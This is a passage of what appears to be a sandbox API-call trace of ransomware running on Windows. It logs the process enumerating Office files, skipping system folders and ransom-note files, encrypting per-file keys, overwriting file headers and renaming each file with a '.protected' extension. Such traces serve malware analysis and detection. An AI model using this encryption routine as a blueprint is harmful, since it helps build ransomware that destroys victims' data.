lpOverlapped=0x0) returned 1 [0070.141] CloseHandle (hObject=0xd8) returned 1 [0070.143] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.protected") returned 83 [0070.143] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll.protected")) returned 1 [0070.143] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.144] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Windows") returned -1 [0070.144] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Program Files") returned -1 [0070.144] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0070.144] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.144] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0070.144] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned 71 [0070.144] StrStrIW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.144] lstrcmpW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.144] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.144] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.144] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.144] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned 71 [0070.144] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.144] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned 71 [0070.144] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.144] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned 71 [0070.144] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.144] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.161] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.161] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.162] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.162] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.162] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.162] CloseHandle (hObject=0xd8) returned 1 [0070.162] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.protected") returned 81 [0070.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll.protected")) returned 1 [0070.163] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.163] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0070.163] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0070.163] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0070.163] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.163] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0070.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned 70 [0070.163] StrStrIW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.163] lstrcmpW (lpString1="PPINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.163] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.163] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.164] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.164] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned 70 [0070.164] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.164] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned 70 [0070.164] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.164] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned 70 [0070.164] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.164] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.180] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.184] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.185] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.185] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.185] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.185] CloseHandle (hObject=0xd8) returned 1 [0070.186] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.protected") returned 80 [0070.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll.protected")) returned 1 [0070.187] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.187] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="Windows") returned -1 [0070.187] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0070.187] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0070.187] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.187] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0070.187] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned 71 [0070.187] StrStrIW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0070.187] lstrcmpW (lpString1="PPINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.187] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.187] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.187] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.188] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned 71 [0070.188] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.188] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned 71 [0070.188] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.188] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned 71 [0070.188] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.189] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.216] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.216] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.217] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.217] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.232] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.232] CloseHandle (hObject=0xd8) returned 1 [0070.233] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.protected") returned 81 [0070.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll.protected")) returned 1 [0070.234] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.234] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Windows") returned -1 [0070.234] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.234] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.234] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.234] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0070.234] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned 72 [0070.234] StrStrIW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.234] lstrcmpW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.234] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.234] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.234] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.234] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned 72 [0070.234] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.234] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned 72 [0070.234] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.234] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned 72 [0070.234] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.234] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.316] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.316] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.317] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.317] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.317] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.318] CloseHandle (hObject=0xd8) returned 1 [0070.318] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.protected") returned 82 [0070.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll.protected")) returned 1 [0070.450] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.450] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Windows") returned -1 [0070.450] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Program Files") returned 1 [0070.450] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.450] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.450] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0070.450] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned 73 [0070.450] StrStrIW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0070.450] lstrcmpW (lpString1="PUB6INTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.450] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.450] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.450] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.450] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned 73 [0070.450] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.450] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned 73 [0070.450] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.450] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned 73 [0070.450] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.450] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.475] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.475] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.476] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.476] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.503] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.503] CloseHandle (hObject=0xd8) returned 1 [0070.504] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.protected") returned 83 [0070.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll.protected")) returned 1 [0070.504] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.504] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Windows") returned -1 [0070.504] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Program Files") returned 1 [0070.504] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.504] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.504] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="System Volume Information") returned -1 [0070.504] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned 73 [0070.504] StrStrIW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".protected") returned 0x0 [0070.504] lstrcmpW (lpString1="PUBWZINT.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.504] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.504] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.504] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned 73 [0070.505] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned 73 [0070.505] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned 73 [0070.505] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.505] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, 